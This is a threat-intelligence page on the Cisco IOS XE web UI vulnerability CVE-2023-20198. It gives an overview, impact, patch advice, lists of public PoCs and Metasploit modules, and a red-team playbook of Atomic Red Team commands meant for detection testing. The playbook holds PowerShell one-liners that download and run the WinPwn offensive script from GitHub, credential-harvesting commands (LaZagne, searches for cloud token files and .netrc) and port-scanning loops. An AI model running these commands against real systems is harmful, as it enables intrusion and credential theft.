CVE-2023-20198
Overview
This vulnerability is a command injection flaw caused by improper input validation within the web UI component of Cisco IOS XE Software. The root cause lies in the web services management agent (wsma-exec) that processes SOAP requests without adequate sanitization. Specifically, crafted HTTP POST requests targeting the web UI's SOAP-based execCLI interface enable injection of arbitrary commands. The affected component is the web UI feature responsible for remote management and command execution.
Vulnerability Description
Cisco is providing an update for the ongoing investigation into observed exploitation of the web UI feature in Cisco IOS XE Software. We are updating the list of fixed releases and adding the Software Checker. Our investigation has determined that the actors exploited two previously unknown issues. The attacker first exploited CVE-2023-20198 to gain initial access and issued a privilege 15 command to create a local user and password combination. This allowed the user to log in with normal user access. The attacker then exploited another component of the web UI feature, leveraging the new local user to elevate privilege to root and write the implant to the file system. Cisco has assigned CVE-2023-20273 to this issue. CVE-2023-20198 has been assigned a CVSS Score of 10.0. CVE-2023-20273 has been assigned a CVSS Score of 7.2. Both of these CVEs are being tracked by CSCwh87343.
Impact
An unauthenticated attacker can execute arbitrary commands with root-level privileges on the underlying operating system of affected Cisco IOS XE devices. This allows creation of local users with elevated privileges, installation of persistent implants, and full compromise of the device. The attacker gains complete control over network traffic managed by the device, enabling data exfiltration, network manipulation, or service disruption. No user interaction or prior access is needed to exploit this vulnerability, making it highly critical in operational environments.
Solution
Cisco has released updated software versions addressing these vulnerabilities in Cisco IOS XE Software. Administrators should apply the patches as outlined in Cisco Security Advisory cisco-sa-iosxe-webui-privesc-j22SaA4z. The advisory provides a list of fixed releases and includes a Software Checker tool to verify patch status. It is recommended to follow the official Cisco update process to ensure all affected devices are remediated promptly.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability affecting Cisco IOS XE Software and certain Rockwell Automation products presents a critical security risk due to its exploitation of the web UI feature. This vulnerability allows an attacker to gain unauthorized access and escalate privileges within the affected systems. The initial exploitation occurs through the web interface, where the attacker can execute commands at privilege level 15, which is the highest level of access. This capability enables the creation of a local user account with a custom password, granting the attacker normal user access. Subsequently, the attacker can leverage this account to exploit another component of the web UI, allowing for privilege escalation to root and the ability to write malicious implants to the file system.
Attack vectors for this vulnerability are particularly concerning due to the ease with which they can be executed. An attacker with network access to the affected devices can exploit the web UI without requiring physical access. This remote exploitation capability means that organizations could be targeted from anywhere in the world, making it imperative for network administrators to be vigilant. Once the attacker gains initial access, the process of creating a local user and escalating privileges can be automated, allowing for rapid compromise of multiple devices. This scenario underscores the importance of securing web interfaces and monitoring for unusual access patterns.
The real-world impact of this vulnerability is severe, especially for organizations relying on Cisco IOS XE Software for critical infrastructure. The ability to escalate privileges and implant malicious software can lead to significant operational disruptions, data breaches, and potential financial losses. The exploitation of such vulnerabilities can also result in reputational damage, as customers and stakeholders may lose trust in an organization’s ability to protect sensitive information. Furthermore, the presence of this vulnerability in widely used networking equipment could have cascading effects, potentially impacting entire supply chains and critical services.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching affected systems is essential, as Cisco has provided updates to address the identified issues. Network administrators should also employ intrusion detection systems to monitor for unusual activity, particularly around the web UI access. Implementing strict access controls and employing network segmentation can help limit the potential attack surface. Additionally, organizations should conduct regular security assessments and penetration testing to identify and remediate vulnerabilities before they can be exploited.
In conclusion, the vulnerability affecting Cisco IOS XE Software and related products represents a critical threat that necessitates immediate attention from organizations. The ease of exploitation and potential for significant impact make it imperative for businesses to prioritize security measures. By adopting proactive detection and mitigation strategies, organizations can better protect their networks and reduce the risk of unauthorized access and privilege escalation. The ongoing vigilance in monitoring and securing web interfaces will be crucial in safeguarding against this and similar vulnerabilities in the future.
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2023-20198, accompanied by the emergence of new publicly available proof-of-concept tools that enhance attacker capabilities, including user management and command execution on affected Cisco IOS XE devices. This development broadens the exploit landscape, lowering the technical barriers for threat actors to conduct sophisticated intrusions. Although ransomware groups have not been definitively linked to this vulnerability, the presence of the Akira group in related activity underscores the potential for this exploit to be leveraged in broader attack campaigns. Our telemetry indicates that while the overall exploitation trend remains stable, the incremental rise in activity and tool availability elevates the risk profile, warranting continued vigilance. Consequently, the threat level should be considered heightened due to increased ease of exploitation and expanding attacker resources.
Affected Products (6)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Rockwellautomation | Allen-Bradley Stratix 5200 Firmware | All |
cpe:2.3:o:rockwellautomation:allen-bradley_stratix_5200_firmware:*:*:*:*:*:*:*:*
|
|
|
Rockwellautomation | Allen-Bradley Stratix 5800 Firmware | All |
cpe:2.3:o:rockwellautomation:allen-bradley_stratix_5800_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | All |
cpe:2.3:o:cisco:ios_xe:*:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | All |
cpe:2.3:o:cisco:ios_xe:*:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | All |
cpe:2.3:o:cisco:ios_xe:*:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | All |
cpe:2.3:o:cisco:ios_xe:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (3)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Cisco IOX XE unauthenticated OS command execution
auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273
|
sfewer-r7 | Unknown | - | View |
|
Cisco IOX XE unauthenticated Command Line Interface (CLI) execution
auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198
|
sfewer-r7 | Unknown | - | View |
|
Cisco IOX XE Unauthenticated RCE Chain
exploits/linux/misc/cisco_ios_xe_rce
|
sfewer-r7 | Unknown | - | View |
GitHub PoCs (36)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
smokeintheshell/CVE-2023-20198
CVE-2023-20198 Exploit PoC
|
smokeintheshell | 65 | 19 | 2023-11-16 | View |
|
W01fh4cker/CVE-2023-20198-RCE
CVE-2023-20198-RCE, support adding/deleting users and executing cli commands/system commands.
|
W01fh4cker | 42 | 10 | 2024-04-25 | View |
|
fox-it/cisco-ios-xe-implant-detection
Cisco IOS XE implant scanning & detection (CVE-2023-20198, CVE-2023-20273)
|
fox-it | 41 | 9 | 2023-10-23 | View |
|
ZephrFish/CVE-2023-20198-Checker
CVE-2023-20198 & 0Day Implant Scanner
|
ZephrFish | 33 | 11 | 2023-10-17 | View |
|
Shadow0ps/CVE-2023-20198-Scanner
This is a webshell fingerprinting scanner designed to identify implants on Cisco IOS XE WebUI's affected by CVE-2023-201...
|
Shadow0ps | 33 | 6 | 2023-10-23 | View |
|
Atea-Redteam/CVE-2023-20198
CVE-2023-20198 Checkscript
|
Atea-Redteam | 20 | 15 | 2023-10-17 | View |
|
Tounsi007/CVE-2023-20198
CVE-2023-20198 PoC (!)
|
Tounsi007 | 11 | 6 | 2023-10-18 | View |
|
Pushkarup/CVE-2023-20198
A PoC for CVE 2023-20198
|
Pushkarup | 8 | 6 | 2023-10-23 | View |
|
iveresk/cve-2023-20198
1vere$k POC on the CVE-2023-20198
|
iveresk | 6 | 5 | 2023-10-20 | View |
|
RevoltSecurities/CVE-2023-20198
An Exploitation script developed to exploit the CVE-2023-20198 Cisco zero day vulnerability on their IOS routers
|
RevoltSecurities | 7 | 2 | 2023-11-03 | View |
|
sohaibeb/CVE-2023-20198
CISCO CVE POC SCRIPT
|
sohaibeb | 4 | 2 | 2023-10-20 | View |
|
G4sul1n/Cisco-IOS-XE-CVE-2023-20198
Exploit PoC for CVE-2023-20198
|
G4sul1n | 3 | 0 | 2025-04-11 | View |
|
alekos3/CVE_2023_20198_Detector
This script can identify if Cisco IOS XE devices are vulnerable to CVE-2023-20198
|
alekos3 | 2 | 1 | 2023-10-18 | View |
|
securityphoenix/cisco-CVE-2023-20198-tester
cisco-CVE-2023-20198-tester
|
securityphoenix | 1 | 2 | 2023-10-17 | View |
|
Vulnmachines/Cisco_CVE-2023-20198
Cisco CVE-2023-20198
|
Vulnmachines | 2 | 1 | 2023-12-11 | View |
|
mr-r3b00t/CVE-2023-20198-IOS-XE-Scanner
|
mr-r3b00t | 2 | 0 | 2023-10-25 | View |
|
kacem-expereo/CVE-2023-20198
Check a target IP for CVE-2023-20198
|
kacem-expereo | 1 | 0 | 2023-10-24 | View |
|
djayaGit/cve-2023-20198-poc-cisco
CVE-2023-20198是思科IOS XE软件Web UI功能中的一个严重漏洞,允许未经身份验证的远程攻击者在受影响的系统上创建具有特权级别15的账户,从而完全控制设备。
|
djayaGit | 1 | 0 | 2024-11-23 | View |
|
emomeni/Simple-Ansible-for-CVE-2023-20198
|
emomeni | 1 | 0 | 2023-10-17 | View |
|
IceBreakerCode/CVE-2023-20198
|
IceBreakerCode | 1 | 0 | 2023-10-25 | View |
|
abrahamsurf/CVE-2023-20198-Scanner
|
abrahamsurf | 0 | 0 | 2026-07-08 | View |
|
charlesjson/CVE-2023-20198
|
charlesjson | 0 | 0 | 2026-06-25 | View |
|
DOMINIC471/qub-network-security-cve-2023-20198
Analysis, detection, and mitigation of CVE-2023-20198 exploitation in Cisco IOS XE – QUB CSC3064 Network Security Assess...
|
DOMINIC471 | 0 | 0 | 2025-05-15 | View |
|
AjayKalbhile/Cisco-SD-WAN-Auth-Bypass-Pentest
CVE-2023-20198 Authorized Pentest Report | CVSS 9.8
|
AjayKalbhile | 0 | 0 | 2026-04-20 | View |
|
telly251/forwardnetworksdemo
Demo to remediate CVE-2023-20198 using forward networks and tines
|
telly251 | 0 | 0 | 2026-04-10 | View |
|
Gill-Singh-A/CVE-2023-20198-Exploit
Proof-of-concept exploit for CVE-2023-20198, an authentication bypass vulnerability affecting Cisco IOS XE Web UI
|
Gill-Singh-A | 0 | 0 | 2026-02-17 | View |
|
gustavorobertux/cisco-cve-2023-20198-checker
|
gustavorobertux | 0 | 0 | 2026-03-08 | View |
|
netbell/CVE-2023-20198-Fix
Check for and remediate conditions that make an IOS-XE device vulnerable to CVE-2023-20198
|
netbell | 0 | 0 | 2023-12-08 | View |
|
Arshit01/CVE-2023-20198
|
Arshit01 | 0 | 0 | 2025-06-09 | View |
|
Religan/CVE-2023-20198
A cybersecurity case study analysing CVE-2023-20198 in Cisco IOS XE, covering vulnerability exploitation, mitigation str...
|
Religan | 0 | 0 | 2025-12-15 | View |
|
JoyGhoshs/CVE-2023-20198
Checker for CVE-2023-20198 , Not a full POC Just checks the implementation and detects if hex is in response or not
|
JoyGhoshs | 0 | 0 | 2023-10-18 | View |
|
raystr-atearedteam/CVE-2023-20198-checker
|
raystr-atearedteam | 0 | 0 | 2023-10-17 | View |
|
ohlawd/CVE-2023-20198
|
ohlawd | 0 | 0 | 2023-10-25 | View |
|
sanan2004/CVE-2023-20198
|
sanan2004 | 0 | 0 | 2024-08-26 | View |
|
reket99/Cisco_CVE-2023-20198
|
reket99 | 0 | 0 | 2023-10-20 | View |
|
AhmedMansour93/Event-ID-193-Rule-Name-SOC231-Cisco-IOS-XE-Web-UI-ZeroDay-CVE-2023-20198-
🚨 Just completed a detailed investigation for Event ID 193: "SOC231 - Cisco IOS XE Web UI ZeroDay (CVE-2023-20198)" via ...
|
AhmedMansour93 | 0 | 0 | 2024-09-13 | View |
Threat Feed
34 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-20198 |
| sec.cloudapps.cisco.com |
GitHub CVE
|
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-20198 |